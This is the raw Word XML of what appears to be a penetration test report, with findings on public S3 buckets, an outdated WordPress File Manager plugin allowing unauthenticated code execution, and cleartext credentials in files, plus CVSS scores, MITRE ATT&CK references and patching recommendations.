          <w:rStyle w:val="Heading1Char"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Public and Unauthenticated AWS S3 Buckets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130684328"/>
      <w:bookmarkEnd w:id="834673001"/>
      <w:bookmarkEnd w:id="12410264"/>
      <w:bookmarkEnd w:id="1543395729"/>
      <w:bookmarkEnd w:id="1004149653"/>
      <w:bookmarkEnd w:id="1309855717"/>
      <w:bookmarkEnd w:id="1281265040"/>
      <w:bookmarkEnd w:id="1137840847"/>
      <w:bookmarkEnd w:id="425918659"/>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3A9C38A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167D77" w14:textId="1F6611D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E610D6" w14:textId="22B3177B">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BB04098" w14:textId="3BC719C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EFBF68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0C7282" w14:textId="70D2BB5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074EC989" w14:textId="1E3B9479">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539656C7" w:rsidP="0D325B6E" w:rsidRDefault="539656C7" w14:paraId="1FF8457C" w14:textId="51B91F20">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539656C7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>9.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="432342D4">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E4395B2" w14:textId="4496800F">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2B2D603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28E5AA3" w14:textId="7612951F">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90AEF2A" w14:textId="7F6B3DCE">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F87991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056A59A"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="669D7C2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0F751B" w14:textId="7979EE95">
            <w:pPr>
              <w:spacing w:after="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253D4E32">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A8D9BA9" w:rsidP="0D325B6E" w:rsidRDefault="6A8D9BA9" w14:paraId="627B6BC5" w14:textId="7360AB4C">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="R32efaf989447453a">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6A8D9BA9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="6A8D9BA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tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4AE9C261">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AFEA41" w14:textId="09F1027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39A5CAD" w:rsidP="0D325B6E" w:rsidRDefault="339A5CAD" w14:paraId="45C88F1B" w14:textId="5F32327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339A5CAD">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82DEA5" w:rsidP="0D325B6E" w:rsidRDefault="6C82DEA5" w14:paraId="4B08FB02" w14:textId="6E4CB074">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Raf74210389d24b54">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6C82DEA5">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="558CE0E5">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>530</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3CB94757">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6C82DEA5">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5CF1DC4C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Data from Cloud Storage</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="61445FD7">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4E388C19"/>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77D19E5" w:rsidP="0D325B6E" w:rsidRDefault="777D19E5" w14:paraId="022284D8" w14:textId="7C9960F9">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777D19E5">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DFC5CE1" w14:textId="2100C155">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="79B781B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52C7916" w:rsidP="0D325B6E" w:rsidRDefault="552C7916" w14:paraId="56B7F90F" w14:textId="702FE8DD">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552C7916">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CFE5CFC" w14:textId="67B4E4C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4C6967D" w14:textId="5A73E2AB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="4AC1F79F" w:rsidP="0D325B6E" w:rsidRDefault="4AC1F79F" w14:paraId="3BF5446C" w14:textId="2044496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F7E96B7" w:rsidP="0D325B6E" w:rsidRDefault="3F7E96B7" w14:paraId="64953E1C" w14:textId="6736006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pP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The WordPress server </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contains</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an outdated </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version</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of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3F7E96B7">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the File Manager plugin</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allowing an unauthenticated user to execute </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3F7E96B7">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arbitrary code</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3F7E96B7">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 Known CVE: </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3F7E96B7">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t>CVE-2026-12345.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="348B412D" w14:textId="5EB62DCD">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C1F79F" w:rsidP="0D325B6E" w:rsidRDefault="4AC1F79F" w14:paraId="2671C4E2" w14:textId="7C3D6371">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09E083D" w:rsidP="0D325B6E" w:rsidRDefault="609E083D" w14:paraId="1DAC62E5" w14:textId="0209066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09E083D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This outdated plugin presents a significant risk, allowing attackers to execute arbitrary code on the WordPress Server which can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="212485FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">complete compromise of the WordPress server and its backend. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7D358A40" w14:textId="3EF2B317">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="4AC1F79F" w:rsidP="0D325B6E" w:rsidRDefault="4AC1F79F" w14:paraId="64A9684F" w14:textId="1272CF4F">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789567ED" w14:textId="16A123A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69E809D" w14:textId="48049D4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AC1F79F" w:rsidP="0D325B6E" w:rsidRDefault="4AC1F79F" w14:paraId="25B4098A" w14:textId="0DD984D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AC1F79F" w:rsidP="0D325B6E" w:rsidRDefault="4AC1F79F" w14:paraId="7224D498" w14:textId="39FED823">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AC1F79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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="310BDC96">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3699CC3E" w:rsidP="0D325B6E" w:rsidRDefault="3699CC3E" w14:paraId="51AB8233" w14:textId="531A6DC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>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699CC3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Update </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="784B148D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the known vulnerable plugin or completely removing the plugin if it is not actively in use. APTCL should have continuous patching of WordPress plugins and themes </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6D757D9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to keep up to date with security updates to minimize the risk of a successful attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="65950919" w14:textId="6F0E67C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="4AC1F79F" w:rsidP="0D325B6E" w:rsidRDefault="4AC1F79F" w14:paraId="1C1A3D19" w14:textId="6582A56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AC1F79F">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D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2A8BD7D6" w14:textId="6B6711C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4C6D3D0F" w14:textId="4C5B9ADD">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0E69158F" w:rsidP="0D325B6E" w:rsidRDefault="0E69158F" w14:paraId="57AF1C10" w14:textId="104A210F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1245612136" w:id="1372270216"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0E69158F">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0E69158F">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0E69158F">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6B804F7B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc375109952" w:id="506452647"/>
      <w:bookmarkStart w:name="_Toc670949614" w:id="376058050"/>
      <w:bookmarkStart w:name="_Toc2007042234" w:id="1235664096"/>
      <w:bookmarkStart w:name="_Toc1500862233" w:id="634136418"/>
      <w:bookmarkStart w:name="_Toc1412893964" w:id="676055680"/>
      <w:bookmarkStart w:name="_Toc376739231" w:id="982378838"/>
      <w:bookmarkStart w:name="_Toc1108147063" w:id="1240089972"/>
      <w:bookmarkStart w:name="_Toc1722003803" w:id="1770972959"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7B0ACD3E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:commentRangeStart w:id="846705011"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="75958D3D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cleartext Credentials in Files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="982378838"/>
      <w:bookmarkEnd w:id="1240089972"/>
      <w:bookmarkEnd w:id="1770972959"/>
      <w:bookmarkEnd w:id="506452647"/>
      <w:bookmarkEnd w:id="376058050"/>
      <w:bookmarkEnd w:id="1235664096"/>
      <w:bookmarkEnd w:id="634136418"/>
      <w:bookmarkEnd w:id="676055680"/>
      <w:bookmarkEnd w:id="1372270216"/>
      <w:commentRangeEnd w:id="846705011"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="846705011"/>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728EE31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938E66" w14:textId="37A174F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0F143D6" w14:textId="788C4A3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6BA75E" w14:textId="0B7CDB8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4E67D53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5ACE08" w14:textId="00875E4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3A2ABDF" w14:textId="4F391436">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7AA80C4D" w:rsidP="0D325B6E" w:rsidRDefault="7AA80C4D" w14:paraId="480645AC" w14:textId="3F8795C6">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7AA80C4D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="352B2FF3">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>2</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AE18C5D" w14:textId="7882956A">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002FF09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29D4F2" w14:textId="4F479FA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991BCF6" w14:textId="314A97D5">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9BCCE40"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4350" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0BC978C4"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="286C79F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DA57FD" w14:textId="1DFA203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E213239" w:rsidP="0D325B6E" w:rsidRDefault="5E213239" w14:paraId="4C4A30AE" w14:textId="6BA7F78D">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L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" r:id="Re3af8bd0563a4c99">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5E213239">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3FD55C53">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/VA:N/SC:H/SI:H</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5E213239">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1CEA3E6C">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E453DB" w14:textId="4738DEB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FE32C5D" w:rsidP="0D325B6E" w:rsidRDefault="4FE32C5D" w14:paraId="43A42A64" w14:textId="6C8EFE2B">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4FE32C5D">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10C1323" w:rsidP="0D325B6E" w:rsidRDefault="610C1323" w14:paraId="6163707A" w14:textId="6241CF84">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R58e29d529b924a7f">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="610C1323">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1552: Unsecured Credentials - Credentials in Files</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="583CDC0F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="16D8ED4F">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981967F"/>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FE32C5D" w:rsidP="0D325B6E" w:rsidRDefault="4FE32C5D" w14:paraId="52709F9C" w14:textId="5FDF6392">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4FE32C5D">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B1CC331" w:rsidP="0D325B6E" w:rsidRDefault="7B1CC331" w14:paraId="274A419F" w14:textId="20ADF6C4">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R57832e03653e4b2c">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7B1CC331">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1047: Audit</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="7B1CC331" w:rsidP="0D325B6E" w:rsidRDefault="7B1CC331" w14:paraId="653ED8E0" w14:textId="42CBCFA5">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R93a79b8773214533">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7B1CC331">
                <w:rPr>
